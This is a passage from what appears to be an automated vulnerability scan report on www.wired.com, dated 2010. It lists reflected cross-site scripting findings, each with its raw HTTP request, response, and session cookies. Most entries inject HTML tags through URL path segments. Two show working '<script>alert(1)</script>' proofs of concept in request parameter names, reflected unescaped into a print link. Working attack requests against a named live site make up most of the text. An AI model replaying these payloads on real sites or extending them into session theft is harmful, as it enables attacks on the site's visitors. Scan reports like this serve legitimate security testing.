This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureb187a"><a>710ea181819/culturereviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29273 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Sun, 21 Nov 2010 23:09:50 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureb187a"><a>710ea181819 ss_culturereviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101a"><a>c9bdd73e8c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/culturereviewsc101a"><a>c9bdd73e8c4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29273 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:27 GMT Date: Sun, 21 Nov 2010 23:06:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_culturereviewsc101a"><a>c9bdd73e8c4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3632"><a>7fc96fc4812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee3632"><a>7fc96fc4812/design HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29257 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:03 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee3632"><a>7fc96fc4812 ss_design"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4088a"><a>cab77e397f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/design4088a"><a>cab77e397f3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29257 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:29 GMT Date: Sun, 21 Nov 2010 23:06:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_design4088a"><a>cab77e397f3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f5"><a>35b68f7c68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureda2f5"><a>35b68f7c68f/design/multimedia/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureda2f5"><a>35b68f7c68f ss_design c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4136"><a>4e71b2b298e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/designe4136"><a>4e71b2b298e/multimedia/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:19 GMT Date: Sun, 21 Nov 2010 23:07:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_designe4136"><a>4e71b2b298e c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1447"><a>17257c56c9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/design/multimediae1447"><a>17257c56c9f/2008/06/gallery_trains HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29304 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:36 GMT Date: Sun, 21 Nov 2010 23:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_design c_multimediae1447"><a>17257c56c9f"> ...[SNIP]...
1.520. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wired.com
Path:
/culture/design/multimedia/2008/06/gallery_trains
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add6e"><script>alert(1)</script>a2b64047b26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c45a8"><a>9f611b39064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec45a8"><a>9f611b39064/education HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:03 GMT Date: Sun, 21 Nov 2010 23:06:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec45a8"><a>9f611b39064 ss_education"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c85"><a>d84992dbbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/educationb2c85"><a>d84992dbbe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29261 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:27 GMT Date: Sun, 21 Nov 2010 23:06:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_educationb2c85"><a>d84992dbbe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4cf"><a>703cee33c83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureaf4cf"><a>703cee33c83/lifestyle HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:04 GMT Date: Sun, 21 Nov 2010 23:06:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureaf4cf"><a>703cee33c83 ss_lifestyle"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f876e"><a>59992d190ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestylef876e"><a>59992d190ca HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29263 Vary: Accept-Encoding Cache-Control: max-age=588 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestylef876e"><a>59992d190ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a99"><a>d3ff9573830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture95a99"><a>d3ff9573830/lifestyle/multimedia/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture95a99"><a>d3ff9573830 ss_lifestyle c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904b7"><a>ee778010cae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle904b7"><a>ee778010cae/multimedia/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:37 GMT Date: Sun, 21 Nov 2010 23:06:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle904b7"><a>ee778010cae c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a306"><a>ecc32f97413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/multimedia4a306"><a>ecc32f97413/2007/10/gallery_canned_foods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29316 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:55 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_multimedia4a306"><a>ecc32f97413"> ...[SNIP]...
1.528. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e513"><script>alert(1)</script>0b37a4181f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:19 GMT Date: Sun, 21 Nov 2010 23:06:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca90b"><a>e339c09d9c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureca90b"><a>e339c09d9c5/lifestyle/multimedia/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureca90b"><a>e339c09d9c5 ss_lifestyle c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42d5a"><a>f39aa6a9d07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
